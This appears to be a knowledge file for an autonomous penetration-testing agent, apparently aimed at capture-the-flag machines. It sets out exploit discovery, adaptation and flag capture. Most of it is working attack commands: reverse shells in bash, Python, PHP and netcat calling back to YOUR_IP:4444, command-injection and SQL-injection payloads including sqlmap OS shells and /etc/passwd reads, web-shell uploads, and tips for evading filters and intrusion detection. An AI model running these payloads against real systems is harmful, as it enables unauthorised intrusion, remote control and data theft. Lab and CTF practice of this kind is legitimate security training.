| name | exploitation-knowledge |
| description | Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities. |
Exploitation Knowledge Base
Purpose
This knowledge base provides comprehensive exploitation methodologies and techniques. It covers converting discovered vulnerabilities into actual access, finding and adapting exploits, working in non-interactive environments, establishing stable shells, and capturing the user flag.
Core Topics Covered
- Exploit Discovery: Finding relevant exploits for discovered services
- Exploit Adaptation: Modifying exploits to work in the target environment
- Initial Access: Gaining command execution or shell access
- Shell Stabilization: Upgrading to stable, usable shells
- User Flag Capture: Locating and reading user.txt
Tools Available
Exploit Databases
searchsploit - Local exploit-db search
msfconsole - Metasploit framework
- Manual search: ExploitDB, GitHub, security advisories
Shell Tools
- Reverse shells: bash, python, php, nc
- Web shells: PHP, ASP, JSP
rlwrap nc - Stabilize shells
Web Exploitation
sqlmap - SQL injection
curl - Manual web testing
- File upload bypass techniques
- Command injection testing
Credential Testing
hydra - Service brute force (limited use)
ssh/ftp/mysql - Test discovered credentials
Exploitation Workflow
Phase 1: Multi-Source Exploit Discovery
Core Principle: Use multiple exploit sources in parallel - never rely on a single source.
Layered Exploit Search:
searchsploit "service version"
searchsploit CVE-YYYY-XXXXX
msfconsole -q -x "search type:exploit name:service_name; exit"
curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url'
Critical Rules:
- Try all layers - Don't stop at Layer 1 failure
- Parallel search - If time allows, search multiple sources simultaneously
- Cross-validate - If multiple exploits exist, try most reliable/recent first
- Track sources - Record which source worked in
successful_paths
Phase 2: Exploit Analysis
Before running:
- Read the exploit code - understand what it does
- Check requirements - needed libraries, credentials
- Identify target parameters - IP, port, payload location
- Plan adaptation - what needs to be modified
Phase 3: Exploit Adaptation
Common modifications needed:
A. Python Exploits
import sys
target = sys.argv[1]
shell = raw_input("Enter command: ")
target = "10.10.10.1"
shell = "/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
B. Metasploit Exploits
msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS 10.10.10.1; set LHOST YOUR_IP; run; exit"
C. Reverse Shell Payloads
bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
nc YOUR_IP 4444 -e /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP 4444 >/tmp/f
Phase 4: Listener Setup
Always start listener before triggering exploit:
nc -lvnp 4444
rlwrap nc -lvnp 4444
Phase 5: Execution
Execute exploit and verify success:
python3 exploit.py
id
whoami
pwd
Phase 6: Shell Stabilization
Once you have basic shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo; fg
export TERM=xterm
Common Attack Vectors
1. File Upload Vulnerabilities
curl -F "file=@shell.php" http://TARGET/upload.php
gobuster dir -u http://TARGET/uploads -x php,phtml
curl http://TARGET/uploads/shell.php?cmd=id
2. SQL Injection
sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3
sqlmap -u "http://TARGET/page.php?id=1" --os-shell
sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd
3. Command Injection
curl "http://TARGET/ping.php?ip=127.0.0.1;id"
curl "http://TARGET/ping.php?ip=127.0.0.1|whoami"
curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`"
curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
4. Public Exploits
searchsploit CVE-2021-XXXX
curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url'
wget https://raw.githubusercontent.com/user/repo/exploit.py
python3 exploit.py
5. Default Credentials
Test these FIRST before complex exploits:
ssh admin@TARGET
ftp TARGET
mysql -h TARGET -u root -p
Environment Detection and Payload Adaptation
Core Principle: Always probe environment before choosing exploitation method.
Pre-Exploitation Environment Check
Check your attacking machine:
java -version 2>&1 | head -1
python3 --version
gcc --version
which nc netcat ncat
Check target environment (after gaining RCE):
which nc python python3 php perl bash sh curl wget
python --version
php --version
ls -la /tmp /dev/shm /var/tmp
Adaptive Payload Selection
Decision Tree for Reverse Shells:
1. Do we have RCE?
└─ Yes → Proceed to step 2
└─ No → Get RCE first (file upload, SQLi, etc.)
2. Check target environment
└─ nc available? → Use nc reverse shell
└─ python available? → Use python reverse shell
└─ php available? (web server) → Use PHP reverse shell
└─ bash available? → Use bash /dev/tcp method
└─ None? → Upload binary or use alternative method
3. Test for filtering
└─ Try basic command: echo test
└─ If special chars blocked (/, &, >, |) → Use encoding:
- Base64: echo BASE64 | base64 -d | bash
- Hex encoding
- URL encoding
└─ If commands filtered by keyword → Try alternatives:
- cat → head, tail, nl, more, less
- nc → /dev/tcp, telnet, socat
Example Adaptive Flow:
curl "http://TARGET/shell.php?cmd=which nc"
curl "http://TARGET/shell.php?cmd=which python3"
curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'"
Failure Diagnosis for Exploits
When exploit fails, systematically diagnose:
Possible causes:
- Firewall blocking
- Wrong target IP/port
- Service actually not vulnerable
Action: Verify target is reachable, try different port, re-check vulnerability
Possible causes:
- Missing dependency (library, tool)
- Wrong syntax for target environment
- Version mismatch
Action: Read error carefully, install missing deps, adapt exploit code
Possible causes:
- Payload blocked by filtering
- Target missing required tool (nc, python)
- Firewall blocking outbound connections
Action: Try different payload encoding, use different shell method, test with simple command first
Possible causes:
- Bug in Metasploit module
- Configuration issue
Action: Try alternative exploit source (GitHub, manual PoC), check module options
Record diagnosis in state:
jq '.failed_attempts += [{
"exploit": "CVE-2021-12345",
"tool": "metasploit",
"failure_type": "no shell received",
"diagnosis": "target missing nc, switched to python payload",
"resolution": "used GitHub PoC with python reverse shell - success"
}]' .pentest-state.json
Handling Non-Interactive Shells
Since you're in CLI-only environment:
Execute Commands Without TTY
curl http://TARGET/shell.php?cmd=cat+/etc/passwd
curl http://TARGET/shell.php?cmd=cd+/home;ls+-la
curl http://TARGET/shell.php?cmd=id;whoami;pwd
Background Reverse Shells
nc -lvnp 4444 > shell-output.txt 2>&1 &
python3 exploit.py
cat shell-output.txt
mkfifo /tmp/pipe
nc YOUR_IP 4444 < /tmp/pipe | /bin/bash > /tmp/pipe 2>&1 &
User Flag Capture
Once you have command execution:
1. Locate User Flag
find / -name "user.txt" 2>/dev/null
find /home -name "user.txt" 2>/dev/null
find /home -name "*.txt" 2>/dev/null
cat /home/*/user.txt
cat /home/user/user.txt
2. Read and Verify
cat /home/username/user.txt
cat /home/username/user.txt | wc -c
3. Update State
USER_FLAG=$(cat /home/username/user.txt)
jq --arg flag "$USER_FLAG" '.flags.user = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json
Troubleshooting Failed Exploits
Common Issues
-
"Connection refused"
- Check listener is running:
netstat -tlnp | grep 4444
- Verify firewall allows connections
- Try different port
-
"Module not found" (Python)
- Install:
pip3 install requests pycrypto
- Or adapt code to remove dependency
-
"Permission denied"
- Exploit may need root privileges
- Try different vulnerability
-
"Exploit works but no shell"
- Check payload syntax
- Try different reverse shell method
- Verify target has bash/python/nc
-
"Timeout" or "No response"
- Target may have WAF/IDS
- Try encoding payload
- Use slower, stealthier approach
Decision Tree
Found Vulnerability
│
├─ Is there a public exploit?
│ ├─ Yes → Search searchsploit/GitHub
│ │ → Adapt and run
│ └─ No → Can you write custom exploit?
│ → Develop PoC
│
├─ Initial Access Gained?
│ ├─ Yes → Capture user flag
│ │ → Proceed to privilege escalation
│ └─ No → Try alternative vector
│ → Review reconnaissance data
│ → Attempt different service
│
└─ Stuck after 3 attempts?
→ Re-run reconnaissance
→ Look for overlooked services
→ Check for misconfigurations
Output Format
After successful exploitation:
{
"status": "user_access_gained",
"method": "File upload RCE via /uploads",
"access_level": "www-data",
"shell_type": "non-interactive webshell",
"user_flag": "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6",
"credentials_found": [],
"next_steps": "Privilege escalation required for root flag"
}
Success Criteria
Success criteria:
- ✅ Command execution achieved on target
- ✅ User flag located and read
- ✅ Flag is 32-character hexadecimal string
- ✅ Access documented in state file
- ✅ Ready to proceed to privilege escalation phase
Key Principles
- Adapt exploits - public exploits rarely work as-is
- Handle non-interactive - CLI-only environment requires creativity
- Verify success - always test access with
id, whoami
- Capture flag - don't proceed without user.txt content
- Document method - save successful path for future reference
Remember
- Try simple before complex (default creds before 0-days)
- Read exploit code before running (understand what it does)
- Non-interactive shells require different commands
- User flag MUST be captured before moving to privesc
- If stuck, revisit reconnaissance for missed vectors